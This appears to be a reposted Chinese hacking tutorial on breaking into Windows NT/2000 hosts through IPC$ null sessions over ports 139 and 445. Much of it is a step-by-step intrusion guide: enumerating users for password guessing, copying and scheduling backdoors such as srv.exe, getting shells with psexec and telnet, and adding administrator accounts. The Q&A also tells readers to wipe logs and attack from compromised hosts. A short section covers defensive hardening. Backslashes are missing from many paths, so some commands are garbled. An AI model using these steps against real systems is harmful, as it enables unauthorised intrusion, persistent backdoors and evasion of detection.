445端口入侵詳解

　　445端口入侵詳解

　　關于“445端口入侵”的內容

　　445端口入侵詳解

　　本站搜索更多關于“445端口入侵”的內容

　　445端口入侵，在這之前我們首先要看的還是445端口為什么回成為入侵的端口呢?

　　445端口就是IPC 服務的默認端口

　　ipc$

　　一 摘要

　　二 什么是 ipc$

　　三 什么是空會話

　　四 空會話可以做什么

　　五 ipc$ 所使用的端口

　　六 ipc 管道在 hack 攻擊中的意義

　　七 ipc$ 連接失敗的常見原因

　　八 復制文件失敗的原因

　　九 關于 at 命令和 xp 對 ipc$ 的限制

　　十 如何打開目標的 IPC$ 共享以及其他共享

　　十一 一些需要 shell 才能完成的命令

　　十二 入侵中可能會用到的命令

　　十三 對比過去和現(xiàn)今的 ipc$ 入侵

　　十四 如何防范 ipc$ 入侵

　　十五 ipc$ 入侵問答精選

　　十六 結束的話

　　一 摘要

　　網(wǎng)上關于 ipc$入侵的文章可謂多如牛毛，攻擊步驟甚至已經(jīng)成為了固化的模式，因此也沒人愿意再把這已經(jīng)成為定式的東西拿出來擺弄。不過話雖這樣說，我認為這些文章講解的并不詳細，一些內容甚至是錯誤的，以致對 ipc$的提問幾乎占了各大安全論壇討論區(qū)的半壁江山，而且這些問題常常都是重復的，嚴重影響了論壇質量和學習效率，因此我總結了這篇文章，希望能把 ipc$這部分東西盡量說清楚。

　　注意：本文所討論的各種情況均默認發(fā)生在 win NT/2000 環(huán)境下， win98 將不在此次討論之列。

　　二 什么是 ipc$

　　IPC$(Internet Process Connection) 是共享 " 命名管道 "的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進行加密數(shù)據(jù)的交換，從而實現(xiàn)對遠程計算機的訪問。 IPC$ 是 NT/2000 的一項新功能，它有一個特點，即在同一時間內，兩個 IP 之間只允許建立一個連接。NT/2000 在提供了 ipc$ 功能的同時，在初次安裝系統(tǒng)時還打開了默認共享，即所有的邏輯共享 (c$,d$,e$ …… ) 和系統(tǒng)目錄winnt 或 windows(admin$) 共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導致了系統(tǒng)安全性的降低。

　　平時我們總能聽到有人在說 ipc$ 漏洞， ipc$ 漏洞，其實 ipc$ 并不是一個真正意義上的漏洞 , 我想之所以有人這么說，一定是指微軟自己安置的那個‘后門'：空會話( Null session )。那么什么是空會話呢?

　　三 什么是空會話

　　在介紹空會話之前，我們有必要了解一下一個安全會話是如何建立的。

　　在 Windows NT 4.0 中是使用挑戰(zhàn)響應協(xié)議與遠程機器建立一個會話的，建立成功的會話將成為一個安全隧道，建立雙方通過它互通信息，這個過程的大致順序如下：

　　1 )會話請求者(客戶)向會話接收者(服務器)傳送一個數(shù)據(jù)包，請求安全隧道的建立;

　　2 )服務器產(chǎn)生一個隨機的 64 位數(shù)(實現(xiàn)挑戰(zhàn))傳送回客戶;

　　3 )客戶取得這個由服務器產(chǎn)生的 64 位數(shù)，用試圖建立會話的帳號的口令打亂它，將結果返回到服務器(實現(xiàn)響應);

　　4 )服務器接受響應后發(fā)送給本地安全驗證( LSA )， LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是服務器的本地帳號，核實本地發(fā)生;如果請求的帳號是一個域的帳號，響應傳送到域控制器去核實。當對挑戰(zhàn)的響應核實為正確后，一個訪問令牌產(chǎn)生，然后傳送給客戶�？蛻羰褂眠@個訪問令牌連接到服務器上的資源直到建議的會話被終止。

　　以上是一個安全會話建立的大致過程，那么空會話又如何呢?

　　空會話是在沒有信任的情況下與服務器建立的會話(即未提供用戶名與密碼)，但根據(jù) WIN2000的訪問控制模型，空會話的建立同樣需要提供一個令牌，可是空會話在建立過程中并沒有經(jīng)過用戶信息的認證，所以這個令牌中不包含用戶信息，因此，這個會話不能讓系統(tǒng)間發(fā)送加密信息，但這并不表示空會話的令牌中不包含安全標識符 SID (它標識了用戶和所屬組)，對于一個空會話， LSA 提供的令牌的SID 是 S- 1-5-7 ，這就是空會話的 SID ，用戶名是： ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的，但是是不能在 SAM 數(shù)據(jù)庫中找到，屬于系統(tǒng)內置的帳號)，這個訪問令牌包含下面?zhèn)窝b的組：

　　Everyone

　　Network

　　在安全策略的限制下，這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那么建立空會話到底可以作什么呢?

　　四 空會話可以做什么

　　對于 NT ，在默認安全設置下，借助空連接可以列舉目標主機上的用戶和共享，訪問 everyone權限的共享，訪問小部分注冊表等，并沒有什么太大的利用價值;對 2000 作用更小，因為在 Windows 2000和以后版本中默認只有管理員和備份操作員有權從網(wǎng)絡訪問到注冊表，而且實現(xiàn)起來也不方便，需借助工具。

　　從這些我們可以看到，這種非信任會話并沒有多大的用處，但從一次完整的 ipc$入侵來看，空會話是一個不可缺少的跳板，因為我們從它那里可以得到戶列表，而大多數(shù)弱口令掃描工具就是利用這個用戶列表來進行口令猜解的，成功的導出用戶列表大大增加了猜解的成功率，僅從這一點，足以說明空會話所帶來的安全隱患，因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令：

　　1 首先，我們先建立一個空會話(當然，這需要目標開放 ipc$ )

　　命令： net use ipipc$ "" /user:""

　　注意：上面的命令包括四個空格， net 與 use 中間有一個空格， use 后面一個，密碼左右各一個空格。

　　2 查看遠程主機的共享資源

　　命令： net view ip

　　解釋：前提是建立了空連接后，用此命令可以查看遠程主機的共享資源，如果它開了共享，可以得到如下面的結果，但此命令不能顯示默認共享。

　　在 *.*.*.* 的共享資源

　　資源共享名 類型 用途 注釋

　　-----------------------------------------------------------

　　NETLOGON Disk Logon server share

　　SYSVOL Disk Logon server share

　　命令成功完成。

　　3 查看遠程主機的當前時間

　　命令： net time ip

　　解釋：用此命令可以得到一個遠程主機的當前時間。

　　4 得到遠程主機的 NetBIOS 用戶名列表(需要打開自己的 NBT )

　　命令： nbtstat -A ip

　　用此命令可以得到一個遠程主機的 NetBIOS 用戶名列表，返回如下結果：

　　Node IpAddress: [*.*.*.*] Scope Id: []

　　NetBIOS Remote Machine Name Table

　　Name Type Status

　　---------------------------------------------

　　SERVER <00> UNIQUE Registered

　　OYAMANISHI-H <00> GROUP Registered

　　OYAMANISHI-H < 1C > GROUP Registered

　　SERVER <20> UNIQUE Registered

　　OYAMANISHI-H <1B> UNIQUE Registered

　　OYAMANISHI-H <1E> GROUP Registered

　　SERVER <03> UNIQUE Registered

　　OYAMANISHI-H <1D> UNIQUE Registered

　　..__MSBROWSE__.<01> GROUP Registered

　　INet~Services < 1C > GROUP Registered

　　IS~SERVER......<00> UNIQUE Registered

　　MAC Address = 00-50-8B -9A -2D-37

　　以上就是我們經(jīng)常使用空會話做的事情，好像也能獲得不少東西喲，不過要注意一點：建立 IPC$ 連接的操作會在 Event Log 中留下記錄，不管你是否登錄成功。 好了，那么下面我們就來看看 ipc$ 所使用的端口是什么?

　　五 ipc$ 所使用的端口

　　首先我們來了解一些基礎知識：

　　1 SMBServer Message Block) Windows 協(xié)議族，用于文件打印共享的服務;

　　2 NBTNETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )端口實現(xiàn)基于 TCP/IP 協(xié)議的 NETBIOS 網(wǎng)絡互聯(lián)。

　　3 在 WindowsNT 中 SMB 基于 NBT 實現(xiàn)，即使用 139 ( TCP )端口;而在 Windows2000 中， SMB 除了基于 NBT 實現(xiàn)，還可以直接通過 445 端口實現(xiàn)。

　　有了這些基礎知識，我們就可以進一步來討論訪問網(wǎng)絡共享對端口的選擇了：

　　對于 win2000 客戶端(發(fā)起端)來說：

　　1 如果在允許 NBT 的情況下連接服務器時，客戶端會同時嘗試訪問 139 和 445 端口，如果 445 端口有響應，那么就發(fā)送 RST包給 139 端口斷開連接，用 455 端口進行會話，當 445 端口無響應時，才使用 139 端口，如果兩個端口都沒有響應，則會話失敗;

　　2 如果在禁止 NBT 的情況下連接服務器時，那么客戶端只會嘗試訪問 445 端口，如果 445 端口無響應，那么會話失敗。

　　對于 win2000 服務器端來說：

　　1 如果允許 NBT, 那么 UDP 端口 137, 138, TCP 端口 139, 445 將開放( LISTENING );

　　2 如果禁止 NBT ，那么只有 445 端口開放。

　　我們建立的 ipc$ 會話對端口的選擇同樣遵守以上原則。顯而易見，如果遠程服務器沒有監(jiān)聽 139 或 445 端口， ipc$ 會話是無法建立的。

　　六 ipc 管道在 hack 攻擊中的意義

　　ipc 管道本來是微軟為了方便管理員進行遠程管理而設計的，但在入侵者看來，開放 ipc 管道的主機似乎更容易得手。通過 ipc管道，我們可以遠程調用一些系統(tǒng)函數(shù)(大多通過工具實現(xiàn)，但需要相應的權限)，這往往是入侵成敗的關鍵。如果不考慮這些，僅從傳送文件這一方面，ipc 管道已經(jīng)給了入侵者莫大的支持，甚至已經(jīng)成為了最重要的傳輸手段，因此你總能在各大論壇上看到一些朋友因為打不開目標機器的 ipc管道而一籌莫展大呼救命。當然，我們也不能忽視權限在 ipc管道中扮演的重要角色，想必你一定品嘗過空會話的尷尬，沒有權限，開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權限，那么 ipc管道這把雙刃劍將顯示出它猙獰的一面。

　　七 ipc$ 連接失敗的常見原因

　　以下是一些常見的導致 ipc$ 連接失敗的原因：

　　1 IPC 連接是 Windows NT 及以上系統(tǒng)中特有的功能，由于其需要用到 Windows NT 中很多 DLL 函數(shù)，所以不能在Windows 9.x/Me 系統(tǒng)中運行，也就是說只有 nt/2000/xp 才可以相互建立 ipc$ 連接， 98/me 是不能建立ipc$ 連接的;

　　2 如果想成功的建立一個 ipc$ 連接，就需要響應方開啟 ipc$ 共享，即使是空連接也是這樣，如果響應方關閉了 ipc$ 共享，將不能建立連接;

　　3 連接發(fā)起方未啟動 Lanmanworkstation 服務(顯示名為： Workstation )：它提供網(wǎng)絡鏈結和通訊，沒有它發(fā)起方無法發(fā)起連接請求;

　　4 響應方未啟動 Lanmanserver 服務(顯示名為： Server )：它提供了 RPC 支持、文件、打印以及命名管道共享， ipc$ 依賴于此服務，沒有它主機將無法響應發(fā)起方的連接請求，不過沒有它仍可發(fā)起 ipc$ 連接;

　　5 響應方未啟動 NetLogon ，它支持網(wǎng)絡上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);

　　6 響應方的 139 ， 445 端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽;

　　7 連接發(fā)起方未打開 139 ， 445 端口;

　　8 用戶名或者密碼錯誤：如果發(fā)生這樣的錯誤，系統(tǒng)將給你類似于 ' 無法更新密碼 ' 這樣的錯誤提示(顯然空會話排除這種錯誤);

　　9 命令輸入錯誤：可能多了或少了空格，當用戶名和密碼中不包含空格時兩邊的雙引號可以省略，如果密碼為空，可以直接輸入兩個引號 "" 即可;

　　10 如果在已經(jīng)建立好連接的情況下對方重啟計算機，那么 ipc$ 連接將會自動斷開，需要重新建立連接。

　　另外 , 你也可以根據(jù)返回的錯誤號分析原因：

　　錯誤號 5 ，拒絕訪問：很可能你使用的用戶不是管理員權限的;

　　錯誤號 51 ， Windows 無法找到網(wǎng)絡路徑：網(wǎng)絡有問題;

　　錯誤號 53 ，找不到網(wǎng)絡路徑： ip 地址錯誤;目標未開機;目標 lanmanserver 服務未啟動;目標有防火墻(端口過濾);

　　錯誤號 67 ，找不到網(wǎng)絡名：你的 lanmanworkstation 服務未啟動或者目標刪除了 ipc$ ;

　　錯誤號 1219 ，提供的憑據(jù)與已存在的憑據(jù)集沖突：你已經(jīng)和對方建立了一個 ipc$ ，請刪除再連;

　　錯誤號 1326 ，未知的用戶名或錯誤密碼：原因很明顯了;

　　錯誤號 1792 ，試圖登錄，但是網(wǎng)絡登錄服務沒有啟動：目標 NetLogon 服務未啟動;

　　錯誤號 2242 ，此用戶的密碼已經(jīng)過期：目標有帳號策略，強制定期要求更改密碼。

　　八 復制文件失敗的原因

　　有些朋友雖然成功的建立了 ipc$ 連接，但在 copy 時卻遇到了這樣那樣的麻煩，無法復制成功，那么導致復制失敗的常見原因又有哪些呢?

　　1 對方未開啟共享文件夾

　　這類錯誤出現(xiàn)的'最多，占到 50% 以上。許多朋友在 ipc$連接建立成功后，甚至都不知道對方是否有共享文件夾，就進行盲目復制，結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用 netview IP 這個命令看一下你想要復制的共享文件夾是否存在(用軟件查看當然更好)，不要認為能建立 ipc$ 連接就一定有共享文件夾存在。

　　2 向默認共享復制失敗

　　這類錯誤也是大家經(jīng)常犯的，主要有兩個小方面：

　　1 )錯誤的認為能建立 ipc$ 連接的主機就一定開啟了默認共享，因而在建立完連接之后馬上向 c$,d$,admin$之類的默認共享復制文件，一旦對方未開啟默認共享，將導致復制失敗。 ipc$ 連接成功只能說明對方打開了 ipc$共享，并不能說明默認共享一定存在。 ipc$ 共享與默認共享是 兩碼 事， ipc$共享是一個命名管道，并不是哪個實際的文件夾，而默認共享卻是實實在在的共享文件夾;

　　2 )由于 net view IP 這個命令無法顯示默認共享文件夾(因為默認共享帶 $)，因此通過這個命令，我們并不能判斷對方是否開啟了默認共享，因此如果對方未開啟默認共享，那么所有向默認共享進行的操作都不能成功;(不過大部分掃描軟件在掃弱口令的同時，都能掃到默認共享目錄，可以避免此類錯誤的發(fā)生)

　　要點：請大家一定區(qū)分 ipc 共享，默認共享，普通共享這三者的區(qū)別： ipc 共享是一個管道，并不是實際的共享文件夾;默認共享是安裝時默認打開的文件夾;普通共享是我們自己開啟的可以設置權限的共享文件夾。

　　3 用戶權限不夠，包括四種情形：

　　1 )空連接向所有共享(默認共享和普通共享)復制時，權限是不夠的;

　　2 )向默認共享復制時，在 Win2000 Pro 版中，只有 Administrators 和 Backup Operators 組成員才可以，在 Win2000 Server 版本 Server Operatros 組也可以訪問到這些共享目錄;

　　3 )向普通共享復制時，要具有相應權限(即對方管理員事先設定的訪問權限);

　　4 )對方可以通過防火墻或安全軟件的設置，禁止外部訪問共享;

　　注意：

　　1 不要認為 administrator 就一定具有管理員權限，管理員名稱是可以改的

　　2 管理員可以訪問默認共享的文件夾，但不一定能夠訪問普通的共享文件夾，因為管理員可以對普通的共享文件夾進行訪問權限設置，如圖 6 ，管理員為D 盤設置的訪問權限為僅允許名為 xinxin 的用戶對該文件夾進行完全訪問，那么此時即使你擁有管理員權限，你仍然不能訪問 D盤。不過有意思的是，如果此時對方又開啟了 D$ 的默認共享，那么你卻可以訪問 D$ ，從而繞過了權限限制，有興趣的朋友可以自己做測試。

　　4 被防火墻殺死或在局域網(wǎng)

　　還有一種情況，那就是也許你的復制操作已經(jīng)成功，但當遠程運行時，被防火墻殺掉了，導致找不到文件;或者你把木馬復制到了局域網(wǎng)內的主機，導致連接失敗(反向連接的木馬不會發(fā)生這種情況)。如果你沒有想到這種情況，你會以為是復制上出了問題，但實際你的復制操作已經(jīng)成功了，只是運行時出了問題。

　　呵呵，大家也知道， ipc$ 連接在實際操作過程中會出現(xiàn)各種各樣的問題，上面我所總結的只是一些常見錯誤，沒說到的，大家可以給我提個醒兒。

　　九 關于 at 命令和 xp 對 ipc$ 的限制

　　本來還想說一下用 at 遠程運行程序失敗的原因，但考慮到 at的成功率不是很高，問題也很多，在這里就不提它了(提的越多，用的人就越多)，而是推薦大家用 psexec.exe遠程運行程序，假設想要遠程機器執(zhí)行本地 c:xinxin.exe 文件，且管理員為 administrator ，密碼為 1234，那么輸入下面的命令：

　　psexec ip -u administrator -p 1234 -c c:xinxin.exe

　　如果已經(jīng)建立 ipc 連接，則 -u -p 這兩個參數(shù)不需要， psexec.exe 將自動拷貝文件到遠程機器并運行。

　　本來 xp 中的 ipc$ 也不想在這里討論，想單獨拿出來討論，但看到越來越多的朋友很急切的提問為什么遇到 xp的時候，大部分操作都很難成功。我在這里就簡單提一下吧，在 xp的默認安全選項中，任何遠程訪問僅被賦予來賓權限，也就是說即使你是用管理員帳戶和密碼，你所得到的權限也只是 Guest，因此大部分操作都會因為權限不夠而失敗，而且到目前為止并沒有一個好的辦法來突破這一限制。所以如果你真的得到了 xp的管理員密碼，我建議你盡量避開 ipc 管道。

　　十 如何打開目標的 IPC$ 共享以及其他共享

　　目標的 ipc$ 不是輕易就能打開的，否則就要天下打亂了。你需要一個 admin 權限的 shell ，比如 telnet ，木馬， cmd 重定向等，然后在 shell 下執(zhí)行：

　　net share ipc$

　　開放目標的 ipc$ 共享;

　　net share ipc$ /del

　　關閉目標的 ipc$ 共享;如果你要給它開共享文件夾，你可以用：

　　net share xinxin=c:

　　這樣就把它的 c 盤開為共享名為 xinxin 共享文件夾了。(可是我發(fā)現(xiàn)很多人錯誤的認為開共享文件夾的命令是 net share c$ ，還大模大樣的給菜鳥指指點點，真是誤人子弟了)。再次聲明，這些操作都是在 shell 下才能實現(xiàn)的。

　　十一 一些需要 shell 才能完成的命令

　　看到很多教程這方面寫的十分不準確，一些需要 shell 才能完成命令就簡簡單單的在 ipc$ 連接下執(zhí)行了，起了誤導作用。那么下面我總結一下需要在 shell 才能完成的命令：

　　1 向遠程主機建立用戶，激活用戶，修改用戶密碼，加入管理組的操作需要在 shell 下完成;

　　2 打開遠程主機的 ipc$ 共享，默認共享，普通共享的操作需要在 shell 下完成;

　　3 運行 / 關閉遠程主機的服務，需要在 shell 下完成;

　　4 啟動 / 殺掉遠程主機的進程，也需要在 shell 下完成(用軟件的情況下除外，如 pskill )。

　　十二 入侵中可能會用到的命令

　　為了這份教程的完整性，我列出了 ipc$入侵中的一些常用命令，如果你已經(jīng)掌握了這些命令，你可以跳過這一部分看下面的內容。請注意這些命令是適用于本地還是遠程，如果只適用于本地，你只能在獲得遠程主機的 shell (如 cmd ， telnet 等)后，才能向遠程主機執(zhí)行。

　　1 建立 / 刪除 ipc$ 連接的命令

　　1 )建立空連接 :

　　net use 127.0.0.1ipc$ "" /user:""

　　2 )建立非空連接 :

　　net use 127.0.0.1ipc$ " 密碼 " /user:" 用戶名 "

　　3 )刪除連接 :

　　net use 127.0.0.1ipc$ /del

　　2 在 ipc$ 連接中對遠程主機的操作命令

　　1 ) 查看遠程主機的共享資源(看不到默認共享) :

　　net view 127.0.0.1

　　2 ) 查看遠程主機的當前時間 :

　　net time 127.0.0.1

　　3 ) 得到遠程主機的 netbios 用戶名列表 :

　　nbtstat -A 127.0.0.1

　　4 )映射 / 刪除遠程共享 :

　　net use z: 127.0.0.1c

　　此命令將共享名為 c 的共享資源映射為本地 z 盤

　　net use z: /del

　　刪除映射的 z 盤，其他盤類推

　　5 )向遠程主機復制文件 :

　　copy 路徑 文件名 IP 共享目錄名，如：

　　copy c:xinxin.exe 127.0.0.1c$ 即將 c 盤下的 xinxin.exe 復制到對方 c 盤內

　　當然，你也可以把遠程主機上的文件復制到自己的機器里：

　　copy 127.0.0.1c$xinxin.exe c:

　　6 )遠程添加計劃任務 :

　　at IP 時間 程序名 如：

　　at 127.0.0.0 11:00 xinxin.exe

　　注意：時間盡量使用 24 小時制;如果你打算運行的程序在系統(tǒng)默認搜索路徑(比如 system32/ )下則不用加路徑，否則必須加全路徑

　　3 本地命令

　　1 )查看本地主機的共享資源(可以看到本地的默認共享)

　　net share

　　2 )得到本地主機的用戶列表

　　net user

　　3 )顯示本地某用戶的帳戶信息

　　net user 帳戶名

　　4 )顯示本地主機當前啟動的服務

　　net start

　　5 )啟動 / 關閉本地服務

　　net start 服務名

　　net stop 服務名

　　6 )在本地添加帳戶

　　net user 帳戶名 密碼 /add

　　7 )激活禁用的用戶

　　net uesr 帳戶名 /active:yes

　　8 )加入管理員組

　　net localgroup administrators 帳戶名 /add

　　很顯然的是，雖然這些都是本地命令，但如果你在遠程主機的 shell 中輸入，比如你 telnet 成功后輸入上面這些命令，那么這些本地輸入將作用在遠程主機上。

　　4 其他一些命令

　　1 ) telnet

　　telnet IP 端口

　　telnet 127.0.0.0 23

　　2 )用 opentelnet.exe 開啟遠程主機的 telnet

　　OpenTelnet.exe ip 管理員帳號 密碼 NTLM 的認證方式 port

　　OpenTelnet.exe 127.0.0.1 administrator "" 1 90

　　不過這個小工具需要滿足四個要求：

　　1 )目標開啟了 ipc$ 共享

　　2 )你要擁有管理員密碼和帳號

　　3 )目標開啟 RemoteRegistry 服務，用戶就可以更改 ntlm 認證

　　4 )對僅 WIN2K/XP 有效

　　3 )用 psexec.exe 一步獲得 shell ，需要 ipc 管道支持

　　psexec.exe IP -u 管理員帳號 -p 密碼 cmd

　　psexec.exe 127.0.0.1 -u administrator -p "" cmd

　　十三 對比過去和現(xiàn)今的 ipc$ 入侵

　　既然是對比，那么我就先把過去的 ipc$ 入侵步驟寫給大家，都是蠻經(jīng)典的步驟：

　　[1]

　　C:>net use 127.0.0.1ipc$ "" /user:admintitrators

　　用掃到的空口令建立連接

　　[2]

　　c:>net view 127.0.0.1

　　查看遠程的共享資源

　　[3]

　　C:>copy srv.exe 127.0.0.1admin$system32

　　將一次性后門 srv.exe 復制到對方的系統(tǒng)文件夾下，前提是 admin$ 開啟

　　[4]

　　C:>net time 127.0.0.1

　　查看遠程主機的當前時間

　　[5]

　　C:>at 127.0.0.1 時間 srv.exe

　　用 at 命令遠程運行 srv.exe ，需要對方開啟了 'Task Scheduler' 服務

　　[6]

　　C:>net time 127.0.0.1

　　再次查看當前時間來估算 srv.exe 是否已經(jīng)運行，此步可以省略

　　[7]

　　C:>telnet 127.0.0.1 99

　　開一個新窗口，用 telnet 遠程登陸到 127.0.0.1 從而獲得一個 shell( 不懂 shell 是什么意思?那你就把它想象成遠程機器的控制權就好了，操作像 DOS) ， 99 端口是 srv.exe 開的一次性后門的端口

　　[8]

　　C:WINNTsystem32>net start telnet

　　我們在剛剛登陸上的 shell 中啟動遠程機器的 telnet 服務，畢竟 srv.exe 是一次性的后門，我們需要一個長久的后門便于以后訪問，如果對方的 telnet 已經(jīng)啟動，此步可省略

　　[9]

　　C:>copy ntlm.exe 127.0.0.1admin$system32

　　在原來那個窗口中將 ntlm.exe 傳過去， ntlm.exe 是用來更改 telnet 身份驗證的

　　[10]

　　C:WINNTsystem32>ntlm.exe

　　在 shell 窗口中運行 ntlm.exe ，以后你就可以暢通無阻的 telnet 這臺主機了

　　[11]

　　C:>telnet 127.0.0.1 23

　　在新窗口中 telnet 到 127.0.0.1 ，端口 23 可省略，這樣我們又獲得一個長期的后門

　　[12]

　　C:WINNTsystem32>net user 帳戶名 密碼 /add

　　C:WINNTsystem32>net uesr guest /active:yes

　　C:WINNTsystem32>net localgroup administrators 帳戶名 /add

　　telnet 上以后，你可以建立新帳戶，激活 guest ，把任何帳戶加入管理員組等

　　好了，寫到這里我似乎回到了 2 ， 3 年前，那時的 ipc$ 大家都是這么用的，不過隨著新工具的出現(xiàn)，上面提到的一些工具和命令現(xiàn)在已經(jīng)不常用到了，那就讓我們看看現(xiàn)在的高效而簡單的 ipc$ 入侵吧。

　　[1]

　　psexec.exe IP -u 管理員帳號 -p 密碼 cmd

　　用這個工具我們可以一步到位的獲得 shell

　　OpenTelnet.exe server 管理員帳號 密碼 NTLM 的認證方式 port

　　用它可以方便的更改 telnet 的驗證方式和端口，方便我們登陸

　　[2]

　　已經(jīng)沒有第二步了，用一步獲得 shell 之后，你做什么都可以了，安后門可以用 winshell ，克隆就用 ca 吧，開終端用 3389.vbe ，記錄密碼用 win2kpass ，總之好的工具不少，隨你選了，我就不多說了。

　　十四 如何防范 ipc$ 入侵

　　1 禁止空連接進行枚舉 ( 此操作并不能阻止空連接的建立 )

　　運行 regedit ，找到如下主鍵 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] 把 RestrictAnonymous = DWORD 的鍵值改為： 1

　　如果設置為 "1" ，一個匿名用戶仍然可以連接到 IPC$ 共享，但無法通過這種連接得到列舉 SAM 帳號和共享信息的權限;在 Windows2000 中增加了 "2" ，未取得匿名權的用戶將不能進行 ipc$ 空連接。建議設置為 1。如果上面所說的主鍵不存在，就新建一個再改鍵值。如果你覺得改注冊表麻煩，可以在本地安全設置中設置此項： 在本地安全設置-本地策略-安全選項-' 對匿名連接的額外限制 '

　　2 禁止默認共享

　　1 )察看本地共享資源

　　運行 -cmd- 輸入 net share

　　2 )刪除共享(重起后默認共享仍然存在)

　　net share ipc$ /delete

　　net share admin$ /delete

　　net share c$ /delete

　　net share d$ /delete (如果有 e,f, ……可以繼續(xù)刪除)

　　3 )停止 server 服務

　　net stop server /y (重新啟動后 server 服務會重新開啟)

　　4 )禁止自動打開默認共享(此操作并不能關閉 ipc$ 共享)

　　運行 -regedit

　　server 版 : 找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareServer ( DWORD )的鍵值改為 :00000000 。

　　pro 版 : 找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareWks ( DWORD )的鍵值改為 :00000000 。

　　這兩個鍵值在默認情況下在主機上是不存在的，需要自己手動添加，修改后重起機器使設置生效。

　　3 關閉 ipc$ 和默認共享依賴的服務 :server 服務

　　如果你真的想關閉 ipc$ 共享，那就禁止 server 服務吧：

　　控制面板 - 管理工具 - 服務 - 找到 server 服務(右擊) - 屬性 - 常規(guī) - 啟動類型 - 選已禁用，這時可能會有提示說： XXX 服務也會關閉是否繼續(xù)，因為還有些次要的服務要依賴于 server 服務，不要管它。

　　4 屏蔽 139 ， 445 端口

　　由于沒有以上兩個端口的支持，是無法建立 ipc$ 的，因此屏蔽 139 ， 445 端口同樣可以阻止 ipc$ 入侵。

　　1 ) 139 端口可以通過禁止 NBT 來屏蔽

　　本地連接- TCP/IT 屬性-高級- WINS -選‘禁用 TCP/IT 上的 NETBIOS '一項

　　2 ) 445 端口可以通過修改注冊表來屏蔽

　　添加一個鍵值

　　Hive: HKEY_LOCAL_MACHINE

　　Key: SystemControlsetServicesNetBTParameters

　　Name: SMBDeviceEnabled

　　Type: REG_DWORD

　　value: 0

　　修改完后重啟機器

　　注意：如果屏蔽掉了以上兩個端口，你將無法用 ipc$ 入侵別人。

　　3 )安裝防火墻進行端口過濾

　　6 設置復雜密碼，防止通過 ipc$ 窮舉出密碼，我覺得這才是最好的辦法，增強安全意識，比不停的打補丁要安全的多。

　　十五 ipc$ 入侵問答精選

　　上面說了一大堆的理論東西，但在實際中你會遇到各種各樣的問題，因此為了給予大家最大的幫助，我整理了各大安全論壇中一些有代表性的問答，其中的一些答案是我給出的，一些是論壇上的回復，如果有什么疑問，可以來找我討論。

　　1. 進行 ipc$ 入侵的時候，會在服務器中留下記錄，有什么辦法可以不讓服務器發(fā)現(xiàn)嗎?

　　答：留下記錄是一定的，你走后用清除日志程序刪除就可以了，或者用肉雞入侵。

　　2. 你看下面的情況是為什么，可以連接但不能復制

　　net use ***.***.***.***ipc$ " 密碼 " /user:" 用戶名 "

　　命令成功

　　copy icmd.exe ***.***.***.***admin$

　　找不到網(wǎng)絡路徑

　　命令不成功

　　答：像“找不到網(wǎng)絡路徑”“找不到網(wǎng)絡名”之類的問題，大多是因為你想要復制到的共享文件夾沒有開啟，所以在復制的時候會出現(xiàn)錯誤，你可以試著找找其他的共享文件夾。

　　3. 如果對方開了 IPC$ ，且能建立空聯(lián)接，但打開 C 、 D 盤時，都要求密碼，我知道是空連接沒有太多的權限，但沒別的辦法了嗎?

　　答：建議先用流光或者別的什么掃描軟件試著猜解一下密碼，如果猜不出來，只能放棄，畢竟空連接的能力有限。

　　4. 我已經(jīng)猜解到了管理員的密碼，且已經(jīng) ipc$ 連接成功了，但 net view ip 發(fā)現(xiàn)它沒開默認共享，我該怎么辦?

　　答：首先糾正你的一個錯誤，用 net view ip 是無法看到默認共享的，你可以試著將文件復制到 c$ ， d$ 看看，如果都不行，說明他關閉了默認共享，那你就用 opentelnet.exe 或 psexec.exe 吧，用法上面有。

　　5.ipc$ 連接成功后，我用下面的命令建立了一個帳戶，卻發(fā)現(xiàn)這個帳戶在我自己的機器上，這是怎么回事?

　　net uset ccbirds /add

　　答： ipc$ 建立成功只能說明你與遠程主機建立了通信隧道，并不意味你取得了一個 shell ，只有在獲得一個 shell (比如 telnet )之后，你才能在遠程機器建立一個帳戶，否則你的操作只是在本地進行。

　　6. 我已進入了一臺肉機，用的管理員帳號，可以看他的系統(tǒng)時間，但是復制程序到他的機子上卻不行，每次都提示“拒絕訪問，已復制 0 個文件”，是不是對方有什么服務沒開，我該怎么辦?

　　答：一般來說“拒絕訪問”都是權限不夠的結果，可能是你用的帳戶有問題，還有一種可能，如果你想向普通共享文件夾復制文件卻返回這個錯誤，說明這個文件夾設置的允許訪問用戶中不包括你(哪怕你是管理員)，這一點我在上一期文章中分析了。

　　7. 我用 Win98 能與對方建立 ipc$ 連接嗎?

　　答：理論上不可以，要進行 ipc$ 的操作，建議用 win2000 ，用其他操作系統(tǒng)會帶來許多不必要的麻煩。

　　8. 我用 net use ipipc$ "" /user "" 成功的建立了一個空會話，但用 nbtstat -A IP 卻無法導出用戶列表，這是為什么?

　　答：空會話在默認的情況下是可以導出用戶列表的，但如果管理員通過修改注冊表來禁止導出列表，就會出現(xiàn)你所說的情況;還有可能是你自己的 NBT 沒有打開， netstat 命令是建立在 NBT 之上的。

　　9. 我建立 ipc$ 連接的時候返回如下信息：‘提供的憑據(jù)與已存在的憑據(jù)集沖突'，怎么回事?

　　答：呵呵，這說明你已經(jīng)與目標主機建立了 ipc$ 連接，兩個主機間同時建立兩個 ipc$ 連接是不允許的。

　　10. 我在映射的時候出現(xiàn)：

　　F:>net use h: 211.161.134.*e$

　　系統(tǒng)發(fā)生 85 錯誤。

　　本地設備名已在使用中。這是怎么回事?

　　答：你也太粗心了吧，這說明你有一個 h 盤了，映射到?jīng)]有的盤符吧!

